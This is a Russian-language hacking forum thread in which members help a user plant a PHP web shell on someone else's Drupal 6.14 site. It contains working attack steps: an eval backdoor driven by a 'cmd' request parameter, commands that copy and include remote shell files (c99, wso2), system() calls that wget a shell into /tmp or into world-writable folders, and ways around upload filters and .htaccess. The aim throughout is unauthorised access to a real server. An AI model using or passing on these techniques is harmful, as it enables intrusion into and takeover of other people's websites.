Drupal: получилось испольнить php-код шелла, но проблема. ПОМОГИТЕ!

Discussion in 'Песочница' started by Arkaim, 24 Dec 2009.

  1. Arkaim

    Arkaim New Member

    Joined:
    6 Oct 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Получилось таким способом исполнить шел: http://forum.antichat.ru/showpost.php?p=1756391&postcount=6

    Всё загрузил, но у меня не открывается шелл, а просто предлагается скачать файл php. Пробываал разные браузеры. Не знаю как быть.

    Потом воспользовался другим способом. Создал тему, сделал её phpшной.

    Вписал в тему сначала <?php include 'http://www.site.ru/files/c99.php3' ?>

    Потом целиком код шелла. При первой загрузке такой странице шелл отображается, но когда пытаюсь сделать какое либо действие, меня кидает уже на обычную страницу с ошибками:

    warning: Invalid argument supplied for foreach() in /var/www/htdocs/www.site.ru/includes/common.inc(1343) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 184.


    Подскажите как быть. Провозился целый день. Шелы залиты на сервак, но не срабатывают а лиш скачиваются. Да и через тему не получается.

    Пожскажите, может быть возможно исполнить какой-либо php-код который загрузить шелл в нужную мне папку. Я посмотрел. У них они там все почти пригодны для этого.

    Очень жду ответа.
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Значит не дурачки админы, тот способ проверялся на Win-платформе, скорее всего правильно расставленные(настроенные) .htaccess

    Попробуй вместо "<?php include 'http://www.site.ru/files/c99.php3' ?>" сделай "if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd]));" и посмотри все папки доступные на запись + их содержимое, учитывая .htaccess-ы сверху и внутри и их содержимое, т.е. нужно искать папку, доступную на запись и где нет ограничений на исполнение файлов. Если только корень - значит лить в корень

    PS: Уверен что версия 6.14? Такой способ заливки

    http://forum.antichat.ru/showpost.php?p=1756391&postcount=6

    канает только на ней

    еще раз проверил - по умолчанию никаких ограничений в этой ветке нет на исполнение .php3 из http://site.ru/sites/default/files/wso2.php3, файл исполняется, не скачивается
     
    #2 Pashkela, 24 Dec 2009
    Last edited: 24 Dec 2009
  3. Arkaim

    Arkaim New Member

    Joined:
    6 Oct 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Вот на эту строку if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd])); сайт никак не реагирует. В папки которые можно залить шелл я и так вижу, так как один раз шелл срабатывает и я вижу корень с папками и их правами. В корень залить точно можно.

    Подскажите код скрипта который можно было бы выполнить, чтобы он закачал файл в корень. Очень жду совета. Надо довести дело до конца)))

    Pashkela, спасибо что откликнулся ;)
     
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    в этом двиге .htaccess в некоторых директорях обрубает php скрипты, то есть если ты даже залил, то код тупо не будет исполняется. Помойму папка случаем не files называется?
     
  5. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Как это никак не реагирует? Ты же сказал, что php-скрипты в теме исполняются. Создай тему, туда пихни этот код, а потом вызови скрипт с параметром ?cmd=phpinfo();, например.
     
  6. Arkaim

    Arkaim New Member

    Joined:
    6 Oct 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    именно так.

    а как же быть тогда? должен же быть выход... например если в статье исполнить какой-нить скрипт который загрузит шелл в другую папку или в корень например. или так нельзя?
     
  7. Arkaim

    Arkaim New Member

    Joined:
    6 Oct 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Вот с параметром сработало :) Я просто в пхп не силён, поэтому туплю.

    PHP Info показалось. Что дальше? Как мне это поможет? Вы уж простите если совсем тупые вопросы...
     
  8. Arkaim

    Arkaim New Member

    Joined:
    6 Oct 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    И так не получается. Прав не хватает. Не загружается шел в папки /etc/, /tmp/ (((((((
     
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    да в тмп накосячил чуть

    с чего ты решил что не грузит в папку /tmp/?
     
    _________________________
    2 people like this.
  10. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Я не смотрел этот друпал,и не пробывал залить шелл.
    Но если там можно добавлять произвольные расширения,то попробуй добавить htaccess, и залить файл со своими правами на исполнение скриптов.Ну это так,раздумья.
    А еще попробуй залить шелл с расширением phtml :) может поможет.
     
  11. Arkaim

    Arkaim New Member

    Joined:
    6 Oct 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Потому что вот такой скрипт <?php curl('http://www.site.ru/files/wso2.txt','/etc/shell.php'); ?>

    не выполняется. пишется готово и белая страница. и инклуд <?php include '/etc/shell.php' ?> не происходит

    как же быть?
     
  12. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    грю накосячил, в /tmp/ лей а не /етс/
     
    _________________________
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    а не так ли в итоге?

    Зачем заново создавать код в странице, ты один раз написал вон тот, который дал тебе пашкела, так его и не меняй , просто вставляй вместо пхпинфо();

    copy('http://www.site.ru/files/wso2.txt','/tmp/1.php');
    а затем include('/tmp/1.php');

    // сорр курсач просто висит не curl а copy
     
    _________________________
    #13 HAXTA4OK, 24 Dec 2009
    Last edited: 24 Dec 2009
  14. Arkaim

    Arkaim New Member

    Joined:
    6 Oct 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Вот что выдаёт когда делаю команду copy

    copy(http://www.site.ru/files/wso2.txt) [function.copy]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/www.site.ru/includes/common.inc(1343) : eval()'d code(1) : eval()'d code on line 1.
     
  15. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Перед тем как использовать copy или include(файла со стороннего сервера), убедись в том что директивы allow_url_fopen или allow_url_include, соответственно, стоят в on.

    если safe_mode=off, то можно с system попробовать,
    =system('wget site.com/shell.txt -O /tmp/1.php'); , или альтернативными качалками , ну и потом инклудить, как было написано выше.
     
    #15 Iceangel_, 24 Dec 2009
    Last edited: 24 Dec 2009
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    ?cmd=system('which wget');
    если вывел, но смотрим дальше.
    ?cmd=system('ls -la'); - ещем, где права 777 /*Iceangel_: проще воспользоваться командой 'find /www -type d -perm 0777'*/
    ?cmd=system('cd папка/где/права/777; wget http://shell.com/shell.txt -O shell.php');

    PROFIT!!!
     
    #16 Tigger, 24 Dec 2009
    Last edited by a moderator: 24 Dec 2009
  17. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Я апну тему...
    Таже трабла, что и у ТСа, тоже версия 6.14 (по changelog'у пасмарел) заливается шелл но .php3 не выполняется, .pl меняется на pl_
    .htaccess меняется на htaccess.
    .php3.7z меняется на .php3_.7z

    А дальше вы про темы говорите, но я немогу найти вобще как там темы заливать :confused:
    Гугл вобще говорит темы надо копировать в папку на сервере, так былбы у меня доступ к папке каконить, нафик мне надо былобы это :eek:
     
    #17 Ponchik, 11 Apr 2010
    Last edited: 11 Apr 2010
  18. hatamahata

    hatamahata Member

    Joined:
    10 Jun 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0

    тоже самое
     
  19. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Ну АП кагбы...
     
  20. _eXorcist_

    _eXorcist_ New Member

    Joined:
    24 Dec 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    скорей всего архивировать папку надо потом заливать на сервер
     
    #20 _eXorcist_, 27 Apr 2010
    Last edited: 27 Apr 2010
Loading...
Similar Threads - Drupal получилось испольнить
  1. DescargaR
    Replies:
    2
    Views:
    2,410
  2. Torchin
    Replies:
    4
    Views:
    2,989